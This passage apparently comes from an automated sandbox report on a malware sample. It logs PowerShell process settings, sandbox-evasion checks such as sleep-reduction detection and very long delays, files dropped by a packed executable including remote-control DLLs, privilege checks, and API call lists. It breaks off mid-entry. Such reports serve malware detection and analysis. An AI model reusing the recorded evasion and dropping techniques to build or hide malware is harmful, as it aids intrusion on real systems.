                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Contains functionality to detect sleep reduction / modifications
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9A31C06_2_6C9A31C0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCA44C06_2_6CCA44C0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _memset,LoadLibraryA,GetProcAddress,GetAdaptersInfo,_malloc,GetAdaptersInfo,wsprintfA,_free,FreeLibrary,6_2_6C9A5E30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6494Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3280Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-kernel32-legacy-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\pyexpat.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\extracted\AudioCapture.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-fibers-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\select.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\python3.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_elementtree.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\python311.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_queue.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_webp.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-sysinfo-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_socket.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_lzma.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_bz2.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_ssl.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\_decimal.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\psutil\_psutil_windows.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-18229
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeAPI coverage: 1.7 %
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeAPI coverage: 7.3 %
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCA44C06_2_6CCA44C0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9A13F0 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C9A14DCh6_2_6C9A13F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA192F0 FindFirstFileExW,FindClose,0_2_00007FF76CA192F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF76CA183B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF76CA318E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA192F0 FindFirstFileExW,FindClose,1_2_00007FF76CA192F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF76CA318E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF76CA183B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7A0340 FindFirstFileExW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetLastError,FindNextFileW,FindClose,FindClose,FindClose,1_2_00007FFDFB7A0340
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBE0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBE0F84
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDEFE1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,6_2_6CBDCA9B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBE0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBE0B33
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBE0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBE0702
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,6_2_6CBDC775
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBA7C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBA7C6D
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDFD86
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_fro